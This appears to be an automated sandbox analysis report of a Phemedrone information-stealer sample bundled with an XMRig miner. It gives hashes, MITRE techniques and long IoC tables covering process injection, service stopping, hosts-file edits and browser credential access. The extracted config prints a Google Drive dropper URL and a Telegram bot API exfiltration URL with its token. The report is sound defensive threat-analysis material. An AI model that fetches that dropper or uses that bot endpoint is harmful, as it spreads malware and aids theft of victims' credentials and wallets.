phemedrone | bab8b5e74ab7210b030316dd5685f3fdcceac35bd3b3a90e5dd01592f8abb630

Analysis

max time kernel
147s
max time network
149s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
23-06-2024 13:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

04/04de7b3f382c41f8bfa36ea205f3ae807457ff7f
Size

16KB
MD5

92ea441c41a44827c7990b05f22d5135
SHA1

04de7b3f382c41f8bfa36ea205f3ae807457ff7f
SHA256

755ff7317e8c83a15b761e0f0c619277f7531dd9fb42772e41df5106c6d047c9
SHA512

bbb61e9ceef563434c503e45d99d52240f42d60ad51ca04f36821209783714e0bb90b23e0e4ca564fcce60dc0f5b6824e7e2338959a039f723beeb8a815c579b
SSDEEP

384:limlNs5sublHZYpcBsOLuzRA9mY1xQrynf5+YuL4aN:5lKHF3uzRcfrM8aN

Score

10^/10

phemedrone xmrig defense_evasion evasion execution miner persistence spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download

Extracted

Family

phemedrone

https://api.telegram.org/bot7274515778:AAEx4SxiDLjUG8dht4Cac1HVmxqTSwD_yL4/sendDocument

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral10/memory/400-876-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral10/memory/400-874-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral10/memory/400-873-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

94 1380 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1948 powershell.exe
2768 powershell.exe
1380 powershell.exe
2044 powershell.exe
2456 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Drops file in Drivers directory 2 IoCs

Processes:

Run64.exepowershell.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts Run64.exe
File created C:\Windows\system32\drivers\etc\hosts powershell.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 3 IoCs

Processes:

Java20.exeRun64.exepowershell.exe

pid process

3456 Java20.exe
4476 Run64.exe
4676 powershell.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
94	1380	powershell.exe

pid	process
1948	powershell.exe
2768	powershell.exe
1380	powershell.exe
2044	powershell.exe
2456	powershell.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	Run64.exe
File created	C:\Windows\system32\drivers\etc\hosts	powershell.exe

pid	process
3456	Java20.exe
4476	Run64.exe
4676	powershell.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral10/memory/400-870-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral10/memory/400-868-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral10/memory/400-872-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral10/memory/400-876-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral10/memory/400-874-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral10/memory/400-871-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral10/memory/400-869-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral10/memory/400-873-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral10/memory/400-878-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral10/memory/400-877-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service
T1102

Processes:

flow ioc

40 drive.google.com
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

Power Settings
T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

3024 powercfg.exe
2868 powercfg.exe
2568 powercfg.exe
3068 powercfg.exe
4036 powercfg.exe
704 powercfg.exe
2576 powercfg.exe
4960 powercfg.exe

flow	ioc
40	drive.google.com

pid	process
3024	powercfg.exe
2868	powercfg.exe
2568	powercfg.exe
3068	powercfg.exe
4036	powercfg.exe
704	powercfg.exe
2576	powercfg.exe
4960	powercfg.exe

Drops file in System32 directory 4 IoCs

Processes:

Run64.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\MRT.exe	Run64.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

Java20.exepowershell.exe

description	pid	process	target process
PID 3456 set thread context of 2940	3456	Java20.exe	RegAsm.exe
PID 4676 set thread context of 4832	4676	powershell.exe	conhost.exe
PID 4676 set thread context of 400	4676	powershell.exe	svchost.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
defense_evasion

Ignore Process Interrupts
T1564.011

Processes:

powershell.exe

pid process

4208 powershell.exe
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4508 sc.exe
4880 sc.exe
236 sc.exe
380 sc.exe
352 sc.exe
4216 sc.exe
2424 sc.exe
4324 sc.exe
4820 sc.exe
1372 sc.exe
1372 sc.exe
528 sc.exe
1292 sc.exe
4312 sc.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

4836 timeout.exe
3680 timeout.exe
1284 timeout.exe

pid	process
4208	powershell.exe

pid	process
4508	sc.exe
4880	sc.exe
236	sc.exe
380	sc.exe
352	sc.exe
4216	sc.exe
2424	sc.exe
4324	sc.exe
4820	sc.exe
1372	sc.exe
1372	sc.exe
528	sc.exe
1292	sc.exe
4312	sc.exe

pid	process
4836	timeout.exe
3680	timeout.exe
1284	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 32 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "835524279"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c517910592b48541be24303fa89e939b00000000020000000000106600000001000020000000293455c186732604eb0abf0d0fb52f332fdefd8c7c21fe965dcad15f42ef9288000000000e80000000020000200000008df9160c1da26a742d84f2a81acf8c28b5e7cf874e249ffe6c5e668e83c2cda020000000f6d309d1057a7ae491957ec1e796ef80af92dafa5b88236cb8954d3b7d4c704d40000000c648aac9f818d6ebb4103e563b4cdd3823792dc2a4afb65eac9f3ba102df933369fff34f136b8e451c84a646fef346722f73199b8158dab28b77179979a941dd	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0b9dd316ec5da01	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "835524279"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31114606"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5D3F90F1-3161-11EF-B03F-4A72145DDB9E} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31114606"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c517910592b48541be24303fa89e939b0000000002000000000010660000000100002000000079079d25de7655f64981d258529f7902f4e1cd60a1ab2a0dc0ecc0e3fbf88d44000000000e80000000020000200000000ff880dee692cd78f097bce5b483c1d32b31a32b421f03805d227f57db23584b200000007450e57fde4a12cec8a59d1ace09bc201bb7f157a075be945e93896be07753f340000000c097fd5b8a5be3af348984fb8efbbb6fac540df69d53052fb1a443de22f1b6a6d81e6c366cd7ae2213093a8289bb09e8a110d93550298f4e9b1ec9c55f9d58ca	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d074e2316ec5da01	iexplore.exe

Modifies data under HKEY_USERS 49 IoCs

Processes:

powershell.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133636215826211716"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exepowershell.exeRegAsm.exe

pid	process
3896	chrome.exe
3896	chrome.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
4208	powershell.exe
4208	powershell.exe
4208	powershell.exe
4208	powershell.exe
2768	powershell.exe
2768	powershell.exe
2768	powershell.exe
2768	powershell.exe
1380	powershell.exe
1380	powershell.exe
1380	powershell.exe
1380	powershell.exe
4820	chrome.exe
4820	chrome.exe
4876	powershell.exe
4876	powershell.exe
4876	powershell.exe
4876	powershell.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe
2940	RegAsm.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

chrome.exe

pid process

3896 chrome.exe
3896 chrome.exe
3896 chrome.exe
3896 chrome.exe
3896 chrome.exe
3896 chrome.exe
3896 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

iexplore.exechrome.exe

pid	process
1388	iexplore.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe

Suspicious use of SendNotifyMessage 26 IoCs

Processes:

chrome.exe

pid	process
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

1388 iexplore.exe
1388 iexplore.exe
3492 IEXPLORE.EXE
3492 IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iexplore.exechrome.exe

description	pid	process	target process
PID 1388 wrote to memory of 3492	1388	iexplore.exe	IEXPLORE.EXE
PID 1388 wrote to memory of 3492	1388	iexplore.exe	IEXPLORE.EXE
PID 1388 wrote to memory of 3492	1388	iexplore.exe	IEXPLORE.EXE
PID 3896 wrote to memory of 3920	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 3920	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
PID 3896 wrote to memory of 4452	3896	chrome.exe	chrome.exe
